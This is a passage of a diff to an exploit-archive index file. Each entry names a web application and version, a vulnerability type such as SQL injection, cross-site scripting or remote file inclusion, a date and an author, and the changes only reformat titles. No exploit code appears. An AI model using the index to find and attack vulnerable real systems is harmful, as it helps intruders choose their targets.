- Vbugs.php Cross-Site Scripting",2006-04-07,r0t,php,webapps,0 +27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting",2006-04-07,r0t,php,webapps,0 27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting",2006-04-07,benozor77,php,webapps,0 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - Deptname Parameter Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 @@ -29923,7 +29924,7 @@ id,file,description,date,author,platform,type,port 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections",2005-04-10,r0t,php,webapps,0 -27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 +27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - 'Load.php' Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0 27593,platforms/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php' cid Parameter SQL Injection",2006-04-10,Ph03n1X,php,webapps,0 27594,platforms/cgi/webapps/27594.txt,"Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps,0 @@ -29944,9 +29945,9 @@ id,file,description,date,author,platform,type,port 27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0 27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 -27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - viewtopic.php SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0 +27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - 'viewtopic.php' SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0 27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0 -27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - Include.php SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0 +27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - 'Include.php' SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0 27625,platforms/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Inclusions",2006-04-11,SnIpEr_SA,php,webapps,0 27626,platforms/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps,0 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,php,webapps,0 @@ -29954,12 +29955,12 @@ id,file,description,date,author,platform,type,port 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0 27638,platforms/php/webapps/27638.pl,"SimpleBBS 1.0.6/1.0.7/1.1 - Arbitrary Command Execution",2006-04-13,rUnViRuS,php,webapps,0 -27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0 +27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - 'print.php' Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0 27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - 'Language.php' File Inclusion",2006-04-15,rgod,php,webapps,0 -27644,platforms/php/webapps/27644.txt,"PlanetSearch + - Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0 +27644,platforms/php/webapps/27644.txt,"PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0 27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - 'member.php' SQL Injection",2006-04-13,d4igoro,php,webapps,0 27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps,0 -27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x - print.php Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0 +27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x - 'print.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0 27648,platforms/php/webapps/27648.txt,"MODx CMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0 27649,platforms/php/webapps/27649.txt,"MODx CMS 0.9.1 - 'index.php' Directory Traversal",2006-04-14,"Rusydi Hasan",php,webapps,0 27650,platforms/php/webapps/27650.txt,"Farsinews 2.1/2.5 - 'search.php' Cross-Site Scripting",2006-04-14,"amin emami",php,webapps,0 @@ -29975,7 +29976,7 @@ id,file,description,date,author,platform,type,port 27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 - Page Parameter Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 -27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 - YearCal.php Cross-Site Scripting",2006-04-17,botan,php,webapps,0 +27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 - 'YearCal.php' Cross-Site Scripting",2006-04-17,botan,php,webapps,0 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0 27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,php,webapps,0 @@ -29985,7 +29986,7 @@ id,file,description,date,author,platform,type,port 27675,platforms/php/webapps/27675.txt,"PHPLister 0.4.1 - 'index.php' Cross-Site Scripting",2006-04-18,botan,php,webapps,0 27676,platforms/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting",2006-04-19,LoK-Crew,php,webapps,0 27677,platforms/php/webapps/27677.txt,"Article Publisher 1.0.1 Pro - Multiple SQL Injections",2006-04-19,r0t,php,webapps,0 -27678,platforms/php/webapps/27678.txt,"ModernBill 4.3 - user.php SQL Injection",2006-04-19,r0t,php,webapps,0 +27678,platforms/php/webapps/27678.txt,"ModernBill 4.3 - 'user.php' SQL Injection",2006-04-19,r0t,php,webapps,0 27679,platforms/cgi/webapps/27679.txt,"Visale 1.0 - pbpgst.cgi keyval Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27680,platforms/cgi/webapps/27680.txt,"Visale 1.0 - pblscg.cgi catsubno Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27681,platforms/cgi/webapps/27681.txt,"Visale 1.0 - pblsmb.cgi listno Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 @@ -29994,7 +29995,7 @@ id,file,description,date,author,platform,type,port 27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine - ArchiveApplyDisplay.jsp Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - addlink_lwp.cgi url Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - 'edit.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 -27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 +27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,php,webapps,0 27688,platforms/php/webapps/27688.txt,"ContentBoxx - 'login.php' Cross-Site Scripting",2006-04-19,botan,php,webapps,0 27689,platforms/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 - 'index.cgi' Multiple SQL Injections",2006-04-19,r0t,cgi,webapps,0 @@ -30008,7 +30009,7 @@ id,file,description,date,author,platform,type,port 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 -28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp' Pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 +28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp?Pattern' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmuser/logon.asp' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - 'view_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 @@ -30016,11 +30017,11 @@ id,file,description,date,author,platform,type,port 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - 'Common.php' Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 -27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - 'inc/common.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - 'inc/function.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - 'search.php?q' Cross-Site Scripting",2006-06-05,Luny,php,webapps,0 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php' catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 -28694,platforms/php/webapps/28694.txt,"vBulletin 2.3.x - global.php SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28694,platforms/php/webapps/28694.txt,"vBulletin 2.3.x - 'global.php' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -30032,7 +30033,7 @@ id,file,description,date,author,platform,type,port 27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 27724,platforms/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 -27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 +27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - 'ImageList.php' Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 27731,platforms/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple SQL Injections",2006-04-25,Dr.Jr7,php,webapps,0 27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - 'print.php?cat' SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 @@ -30044,7 +30045,7 @@ id,file,description,date,author,platform,type,port 27739,platforms/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - 'portfolio_photo_popup.php?id' Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 27740,platforms/php/webapps/27740.txt,"CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,outlaw.dll,php,webapps,0 27741,platforms/php/webapps/27741.txt,"Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0 -27742,platforms/php/webapps/27742.txt,"DevBB 1.0 - member.php Cross-Site Scripting",2006-04-26,Qex,php,webapps,0 +27742,platforms/php/webapps/27742.txt,"DevBB 1.0 - 'member.php' Cross-Site Scripting",2006-04-26,Qex,php,webapps,0 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 27751,platforms/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 @@ -30056,9 +30057,9 @@ id,file,description,date,author,platform,type,port 27763,platforms/php/webapps/27763.php,"I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0 27767,platforms/php/webapps/27767.txt,"Artmedic Event - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 -27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - Weblog_posting.php SQL Injection",2006-04-29,Qex,php,webapps,0 +27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - 'Weblog_posting.php' SQL Injection",2006-04-29,Qex,php,webapps,0 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 -27855,platforms/php/webapps/27855.txt,"Vizra - A_Login.php Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps,0 +27855,platforms/php/webapps/27855.txt,"Vizra - 'A_Login.php' Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps,0 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 @@ -30080,8 +30081,8 @@ id,file,description,date,author,platform,type,port 27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 27795,platforms/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - 'i.php?a' Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 27796,platforms/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,zone14,php,webapps,0 -27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 - stats.php Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 -27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 - viewcat.php Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 +27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 - 'stats.php' Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 +27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 - 'viewcat.php' Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 @@ -30092,9 +30093,9 @@ id,file,description,date,author,platform,type,port 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - 'dlisting.php?cid' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - 'showpic.php?preloadSlideShow' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 - Linkliste.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 -27813,platforms/asp/webapps/27813.txt,"CyberBuild - 'login.asp' sessionid Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 +27813,platforms/asp/webapps/27813.txt,"CyberBuild - 'login.asp?sessionid' SQL Injection",2006-05-03,r0t,asp,webapps,0 27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 -27815,platforms/asp/webapps/27815.txt,"CyberBuild - 'login.asp' sessionid Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 +27815,platforms/asp/webapps/27815.txt,"CyberBuild - 'login.asp?sessionid' Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27816,platforms/asp/webapps/27816.txt,"CyberBuild - browse0.htm ProductIndex Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27817,platforms/asp/webapps/27817.txt,"CyberBuild - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,r0t,asp,webapps,0 27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - 'index.php' SQL Injection",2006-05-04,almaster,php,webapps,0 @@ -30103,10 +30104,10 @@ id,file,description,date,author,platform,type,port 27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 - BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 27823,platforms/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 - 'index.php' Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 -27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/main.asp?date' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/view.asp?searchFor' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/edit.asp?ID' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/main.asp?date' Cross-Site Scripting",2006-05-08,dj_eyes2005,asp,webapps,0 +27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/main.asp?date' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/view.asp?searchFor' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/edit.asp?ID' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/main.asp?date' Cross-Site Scripting",2006-05-08,dj_eyes2005,asp,webapps,0 27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script - 'admin.php' Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 27831,platforms/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 - 'ArticleView.php?article_id' SQL Injection",2006-05-08,r0t,php,webapps,0 27832,platforms/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 - 'DiscView.php?forum_id' SQL Injection",2006-05-08,r0t,php,webapps,0 @@ -30120,7 +30121,7 @@ id,file,description,date,author,platform,type,port 27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' pfad Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?id' Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 -27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 - showthread.php SQL Injection",2006-05-09,Breeeeh,php,webapps,0 +27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 - 'showthread.php' SQL Injection",2006-05-09,Breeeeh,php,webapps,0 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - Moreinfo.asp Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0 27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0 27846,platforms/asp/webapps/27846.txt,"EImagePro - 'subList.asp?CatID' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 @@ -30143,7 +30144,7 @@ id,file,description,date,author,platform,type,port 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 27879,platforms/php/webapps/27879.txt,"Joomla! Component com_virtuemart 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0 -27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 - ODP.php Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0 +27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 - 'ODP.php' Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0 27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 - HTML Injection",2005-05-15,X-BOY,php,webapps,0 27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 - 'index.php' Cross-Site Scripting",2006-05-15,LoK-Crew,php,webapps,0 27885,platforms/php/webapps/27885.txt,"PHPRemoteView - PRV.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 @@ -30155,12 +30156,12 @@ id,file,description,date,author,platform,type,port 27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - 'default.asp?action' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 - 'profile.asp?get' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - 'default.asp' SQL Injection",2006-05-19,omnipresent,asp,webapps,0 -27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 - DC.php SQL Injection",2006-05-19,Luny,php,webapps,0 +27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 - 'DC.php' SQL Injection",2006-05-19,Luny,php,webapps,0 27900,platforms/php/webapps/27900.txt,"Artmedic NewsLetter 4.1 - 'Log.php' Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x - 'Lang' Multiple Remote File Inclusions",2006-05-26,beford,php,webapps,0 -27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 - show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 -27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 - Guestbook index.php Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 +27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 - 'show.php' SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 +27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 - 'Guestbook index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27909,platforms/php/webapps/27909.txt,"Chipmunk Directory - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27910,platforms/php/webapps/27910.txt,"AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-27,black-code,php,webapps,0 27911,platforms/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps,0 @@ -30177,9 +30178,9 @@ id,file,description,date,author,platform,type,port 27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,php,webapps,0 27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusions",2005-05-31,ERNE,php,webapps,0 27928,platforms/php/webapps/27928.txt,"osTicket 1.x - 'Open_form.php' Remote File Inclusion",2006-05-31,Sweet,php,webapps,0 -27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 - Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0 +27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 - 'Portal.php' SQL Injection",2006-05-31,SpC-x,php,webapps,0 27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 -27933,platforms/php/webapps/27933.txt,"Tekno.Portal - Bolum.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 +27933,platforms/php/webapps/27933.txt,"Tekno.Portal - 'Bolum.php' SQL Injection",2006-06-01,SpC-x,php,webapps,0 27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,php,webapps,0 27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 - 'publication_index.php?tf_lang' Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 - 'group_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps,0 @@ -30204,7 +30205,7 @@ id,file,description,date,author,platform,type,port 27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - 'template.php' Remote File 